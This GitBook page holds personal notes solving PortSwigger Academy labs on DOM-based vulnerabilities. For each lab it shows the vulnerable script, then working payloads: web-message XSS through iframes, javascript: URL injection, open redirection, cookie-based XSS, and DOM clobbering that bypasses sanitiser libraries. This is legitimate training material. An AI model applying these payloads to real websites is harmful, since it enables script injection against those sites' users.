OffSec Notes
  • Offensive Security Notes
    • Linux/Unix
      • Checklist - PrivEsc
        • Related Links
        • Kernel Exploits
        • MYSQL
          • HEX
        • SUID
        • Relative Path in SUID Program
        • Writable /etc/passwd file
        • Writable script in /etc/crontab
        • Writable services
        • Sudo <=1.8.14
        • Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
        • Docker
          • Docker Escape
        • davfs2
        • gcore
        • fail2ban
        • git
        • tar with wildcard
        • Exiftool
      • Limited Shell Escape
      • Wordpress
      • Apache Tomcat
      • Werkzeug Console PIN bypass
        • get_flask_pin.py
      • Java Object Deserialization
      • Redis RCE
      • mongodb
      • Postgres
      • Erlang - 4369
      • rsync - 873
      • Sendmail ClamAV
      • VNC Password Decryptor
    • Windows
      • Checklist - PrivEsc
        • MSSQL
        • PsExec.exe
        • Build Exploits
        • Unquoted Service Paths
        • SeImpersonateToken
        • SeRestorePrivilege
        • SeBackupPrivilege
        • Abuse GPO
        • Job with editable file
        • AlwaysInstallElevated
        • Misconfigured LDAP
        • GMSA
        • MS17-010
      • Useful PS Scripts
        • GetUserSPNs.ps1
        • Master MDF Hash Extraction
        • Spray-Passwords.ps1
      • Password Extraction
      • Office Macro
        • Microsoft Office
        • Open Office
      • Post Exploitation
    • Web
      • SQL Injection
        • mongodb 2.2.3
        • UNION BASED
          • MSSQL
          • Oracle
        • ERROR BASED
        • node.js
    • Nmap samples
    • Shells
      • node.js
      • msfvenom samples
      • Reverse Shells
      • Shellter
    • Enumeration
      • SMB
      • RPC
      • LDAP
    • Buffer Overflow
      • mona
      • fuzzer.py
      • exploit.py
      • bytearray.py
      • pattern_offset.rb
      • pattern_create.rb
    • Password Cracking
    • File Download
      • FTP
    • Port Forwarding
      • Dynamic Forwarding
    • Useful links
  • Blog
    • CRTO I & II
    • OSCP Preparation
    • New OSCP Exam vs Previous OSCP Exam
    • Movements in AD
    • PWK Lab vs PG Practice
  • PortSwigger Academy
    • Server-side topics
      • Authentication vulnerabilities
      • OS Command Injection
      • File Path Traversal
      • Business logic vulnerabilities
      • Information disclosure vulnerabilities
      • Access control vulnerabilities and privilege escalation
      • File upload vulnerabilities
      • Server-side request forgery (SSRF)
      • XML external entity (XXE) injection
    • Client-side topics
      • Cross-site scripting
      • Cross-origin resource sharing (CORS)
      • Cross-site request forgery (CSRF)
      • Clickjacking (UI redressing)
      • DOM-based vulnerabilities
      • Testing for WebSockets security vulnerabilities
    • Advanced topics
      • Insecure deserialization
      • Server-side template injection
      • Web cache poisoning
      • HTTP Host header attacks
      • HTTP request smuggling
      • OAuth 2.0 authentication vulnerabilities
      • JWT attacks
  • Walkthroughs
    • PG Practice
      • Linux
        • WARM UP
          • Bratarina
          • ClamAV
          • Exfiltrated
          • Hawat
          • Interface
          • Muddy
          • Pebbles
          • Twiggy
          • Wombo
        • GET TO WORK
          • Banzai
          • Cassios
          • Dibble
          • Fail
          • G00g
          • Hetemit
          • Hunit
          • Maria
          • Nappa
          • Nibbels
          • Nukem
          • Payday
          • Pelican
          • Readys
          • Roquefort
          • Snookums
          • Sorcerer
          • Splodge
          • Sybaris
          • Walla
          • Webcal
          • XposedAPI
          • ZenPhoto
          • Zino
          • QuackerJack
        • TRY HARDER
          • Clyde
          • Peppo
          • Sirol
      • Windows
        • WARM UP
          • Algernon
          • Compromised
          • Helpdesk
          • Internal
          • Kevin
          • Metallus
        • GET TO WORK
          • AuthBy
          • Billyboss
          • Craft
          • Fish
          • Hutch
          • Jacko
          • Nickel
          • Shenzi
          • Slort
        • TRY HARDER
          • Heist
          • Meathead
          • Vault
      • Template
  • About the author
Powered by GitBook
On this page
  • Lab: DOM XSS using web messages
  • Lab: DOM XSS using web messages and a JavaScript URL
  • Lab: DOM XSS using web messages and JSON.parse
  • Lab: DOM-based open redirection
  • Lab: DOM-based cookie manipulation
  • Lab: Exploiting DOM clobbering to enable XSS
  • Lab: Clobbering DOM attributes to bypass HTML filters
  1. PortSwigger Academy
  2. Client-side topics

DOM-based vulnerabilities

https://portswigger.net/web-security/dom-based

Lab: DOM XSS using web messages

This lab demonstrates a simple web message vulnerability.

GET / HTTP/1.1

In response:
<script>
window.addEventListener('message', function(e) {
	document.getElementById('ads').innerHTML = e.data;
})
</script>

Exploit Server ->

Body:

    <iframe src="https://ac461f1a1fcc394cc0502b2f003b0077.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

Lab: DOM XSS using web messages and a JavaScript URL

This lab demonstrates a DOM-based redirection vulnerability that is triggered by web messaging.

GET / HTTP/1.1

In response:
<script>
window.addEventListener('message', function(e) {
	var url = e.data;
	if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
		location.href = url;
	}
}, false);
</script>

Exploit Server ->

Body:

    <iframe src="https://ac821f511ffa44f6c1acd3b900920030.web-security-academy.net" onload="this.contentWindow.postMessage('javascript:print()//https:','*')">

Lab: DOM XSS using web messages and JSON.parse

This lab uses web messaging and parses the message as JSON.

GET / HTTP/1.1

In response:
<script>
window.addEventListener('message', function(e) {
	var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
	document.body.appendChild(iframe);
	try {
		 d = JSON.parse(e.data);
	} 
	catch(e) {
		return;
	}
	switch(d.type) {
		case "page-load":
			ACMEplayer.element.scrollIntoView();
			break;
		case "load-channel":
			ACMEplayer.element.src = d.url;
			break;
		case "player-height-changed":
			ACMEplayer.element.style.width = d.width + "px";
			ACMEplayer.element.style.height = d.height + "px";
			break;
		}
}, false);
</script>

Exploit Server ->

Body:

    <iframe src="https://acfe1f531fae1d58c0ec34ec001300cd.web-security-academy.net" onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'>

Lab: DOM-based open redirection

This lab contains a DOM-based open-redirection vulnerability.

GET /post?postId=10 HTTP/1.1

In response:
<div class="is-linkback">
	<a href='#' onclick='returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1];else location.href = "/"'>Back to Blog</a>
</div>

https://ac501f101ef6a935c0bc968a006300ba.web-security-academy.net/post?postId=10&url=https://exploit-ac7a1f721edea978c0ad96c001130002.web-security-academy.net/

Lab: DOM-based cookie manipulation

This lab demonstrates DOM-based client-side cookie manipulation. To solve this lab, inject a cookie that will cause XSS on a different page and call the print() function. You will need to use the exploit server to direct the victim to the correct pages.

GET /product?productId=1 HTTP/1.1

In response:
<script>
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>

---------

GET / HTTP/1.1
Cookie: session=eIHQNBt0MBawwB6U4VNkeUhA1qJO35FX; lastViewedProduct=https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/product?productId=1

In response:
<a href='https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/product?productId=1'>Last viewed product</a><p>|</p>
<a id=x tabindex=1 onfocus=alert(1)></a>

https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/product?productId=1&' id=x tabindex=1 onfocus=print() random='value'>#x\

Exploit Server ->

Body:

    <iframe src="https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/product?productId=1&' id=x tabindex=1 onfocus=print() random='value" onload='window.location.replace("https://ace51f471f2c9c4dc0f759ee00800004.web-security-academy.net/#x");'>

Lab: Exploiting DOM clobbering to enable XSS

This lab contains a DOM-clobbering vulnerability. The comment functionality allows "safe" HTML.

GET /post?postId=9 HTTP/1.1

In response:
<script src='resources/js/domPurify-2.0.15.js'></script>
<script src='resources/js/loadCommentsWithDomClobbering.js'></script>

Post a comment with this:

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:&quot;onerror=alert(1)//">

Post an another random comment and then xss will be executed.

{avatar: 'cid:"onerror=alert(1)//'}

Lab: Clobbering DOM attributes to bypass HTML filters

This lab uses the HTMLJanitor library, which is vulnerable to DOM clobbering. To solve this lab, construct a vector that bypasses the filter and uses DOM clobbering to inject a vector that calls the print() function.

GET /post?postId=8 HTTP/1.1

In response:
<script src='resources/js/htmlJanitor.js'></script>
<script src='resources/js/loadCommentsWithHtmlJanitor.js'></script>

Post a comment with this:

<form id=x tabindex=0 onfocus=print()><input id=attributes>

Exploit Server ->

Body:

    <iframe src="https://ac9e1fcc1f0a47dec05e09ac00c900d1.web-security-academy.net/post?postId=9" onload="setTimeout(()=>this.src=this.src+'#x',500)"></iframe>
PreviousClickjacking (UI redressing)NextTesting for WebSockets security vulnerabilities

Last updated 3 years ago